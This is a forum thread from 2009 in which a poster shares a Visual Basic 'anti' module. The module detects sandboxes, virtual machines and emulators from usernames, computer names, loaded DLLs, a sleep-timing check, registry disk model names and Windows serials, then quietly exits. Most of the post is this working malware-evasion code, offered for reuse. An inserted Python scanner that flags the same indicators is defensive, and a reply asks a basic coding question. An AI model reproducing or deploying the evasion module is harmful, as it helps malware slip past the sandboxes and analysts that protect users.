Nytro Posted June 29, 2009

This module will detect most of the sandboxes and virtual machines out there. It's the biggest ANTI-module out there.

```vb
'---------------------------------------------------------------------------------------
' Module      : mAnti
' DateTime    : 29/06/2009 15:59
' Author      : SqUeEzEr
' Mail        : scott_van_dinter@hotmail.com
' Purpose     : Detect most of the AV's
'               by: Usernames
'                   Computernames
'                   Loaded Dll's
'                   HardDrive Names
'                   Windows Serials
'                   Emulators
'
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' History     : 29/06/2009 Created......................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long
Private Declare Function GetTickCount Lib "kernel32" () As Long
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal lngMilliseconds As Long)
Private Declare Sub ExitProcess Lib "kernel32" (ByVal uExitCode As Long)

Public Sub sAnti()
    Dim aUsers(6) As String
    Dim aComputers(3) As String
    Dim aDlls(1) As String
    Dim aHDDs(3) As String
    Dim aSerials(1) As String
    Dim sUser As String * 255
    Dim sComputer As String * 255
    Dim sWinSerial As String
    Dim bFound As Boolean
    Dim lBefore As Long
    Dim lAfter As Long
    Dim lhKey As Long
    Dim sBuffer As String
    Dim lLen As Long
    Dim i As Long
    Dim oSet As Object
    Dim oObj As Object

    'initialize strings and arrays
    aUsers(0) = "Sndbx"
    aUsers(1) = "tester"
    aUsers(2) = "panda"
    aUsers(3) = "currentuser"
    aUsers(4) = "Schmidti"
    aUsers(5) = "andy"
    aUsers(6) = "Andy"
    aComputers(0) = "AUTO"
    aComputers(1) = "VMLOG"
    aComputers(2) = "NONE-DUSEZ"
    aComputers(3) = "XPSP3"
    aDlls(0) = "SbieDll.dll"
    aDlls(1) = "dbghelp.dll"
    aHDDs(0) = "*VIRTUAL*"
    aHDDs(1) = "*VMWARE*"
    aHDDs(2) = "*VBOX*"
    aHDDs(3) = "*QEMU*"
    aSerials(0) = "55274-339-6006333-22900"
    aSerials(1) = "76487-OEM-0065901-82986"
    sUser = Environ("username")
    sComputer = Environ("computername")

    'Username Detections
    For i = 0 To UBound(aUsers)
        If Left(sUser, Len(aUsers(i))) = aUsers(i) Then bFound = True
    Next i

    'Computername Detections
    For i = 0 To UBound(aComputers)
        If Left(sComputer, Len(aComputers(i))) = aComputers(i) Then bFound = True
    Next i

    'Dll Detections
    For i = 0 To UBound(aDlls)
        If GetModuleHandleA(aDlls(i)) Then bFound = True
    Next i

    'Emulator Detections, Method by ChainCoder
    lBefore = GetTickCount
    Sleep 510
    lAfter = GetTickCount
    If (lAfter - lBefore) < 500 Then bFound = True

    'HardDrive Detections, Method by Cobein
    If RegOpenKeyExA(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", 0, &H20019, lhKey) = 0 Then
        sBuffer = Space$(255): lLen = 255
        If RegQueryValueExA(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
            sBuffer = UCase(Left$(sBuffer, lLen - 1))
            For i = 0 To UBound(aHDDs)
                If sBuffer Like aHDDs(i) Then bFound = True
            Next i
        End If
        Call RegCloseKey(lhKey)
    End If

    'Windows Serial Detections
    On Error Resume Next
    Set oSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf(Split("Win32_OperatingSystem,SerialNumber", ",")(0))
    sWinSerial = ""
    For Each oObj In oSet
        sWinSerial = oObj.Properties_(Split("Win32_OperatingSystem,SerialNumber", ",")(1)) 'Property value
        sWinSerial = Trim(sWinSerial)
    Next
    For i = 0 To UBound(aSerials)
        If sWinSerial = aSerials(i) Then bFound = True
    Next i

    'Final check
    If bFound = True Then ExitProcess (0)
End Sub
```

Credits for the anti emulator idea: ChainCoder
Credits for the Drive Model Name: Cobein
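A defender-side counterpart to the module above, added here and not part of the original post or of the mAnti code: a small Python triage script that flags source text or extracted strings for the same evasion indicators the module relies on (the sandbox DLL names, the Disk\Enum registry path and VM model patterns, the GetTickCount/Sleep pair, the WMI serial lookup, ExitProcess). The two sample inputs and the "two or more categories" threshold are constructed assumptions, not anything from the post.

```python
"""Static triage of source text or extracted strings for the sandbox/VM
evasion tricks used by the mAnti module above. Added defensive example,
not part of the original post; indicator literals are taken from that code."""
import re

# (match mode, literals). "all" means every literal must appear, because a
# lone Sleep or a lone SerialNumber is common in benign code.
INDICATORS = {
    "sandbox_dll_probe": ("any", ["SbieDll.dll", "dbghelp.dll"]),
    "vm_disk_enum": ("any", [r"Services\Disk\Enum", "*VMWARE*", "*VBOX*", "*QEMU*", "*VIRTUAL*"]),
    "timing_check": ("all", ["GetTickCount", "Sleep"]),
    "environment_probe": ("any", ['Environ("username")', 'Environ("computername")']),
    "wmi_serial": ("all", ["Win32_OperatingSystem", "SerialNumber"]),
    "self_terminate": ("any", ["ExitProcess"]),
}

def scan(text):
    """Return {category: [matched literals]} for every category whose rule is met."""
    hits = {}
    for cat, (mode, lits) in INDICATORS.items():
        found = [lit for lit in lits if re.search(re.escape(lit), text, re.IGNORECASE)]
        if found and (mode == "any" or len(found) == len(lits)):
            hits[cat] = found
    return hits

def verdict(hits):
    """Constructed threshold: two or more independent categories -> analyst review."""
    return "likely-sandbox-evasion" if len(hits) >= 2 else "no-verdict"

# Constructed samples: a few lines in the style of the module vs. a benign macro.
SUSPICIOUS = r'''
If GetModuleHandleA("SbieDll.dll") Then bFound = True
lBefore = GetTickCount: Sleep 510: lAfter = GetTickCount
RegOpenKeyExA &H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", 0, &H20019, lhKey
If sBuffer Like "*VBOX*" Then bFound = True
If bFound = True Then ExitProcess (0)
'''
BENIGN = r'''
Sleep 100
MsgBox "Report generated: " & Format(Now, "yyyy-mm-dd")
'''

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        h = scan(sample)
        print(name, verdict(h), sorted(h))
```

Run it over decompiled source, macro dumps or `strings` output; the category breakdown tells an analyst which trick to neutralise in the sandbox (rename the analysis user, hide the VM disk model, keep Sleep honest) rather than just that something is off.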
a13x4nd7u Posted June 30, 2009

A question... why didn't he write "bFound = False" beforehand? Is every variable of type bool considered false from the start?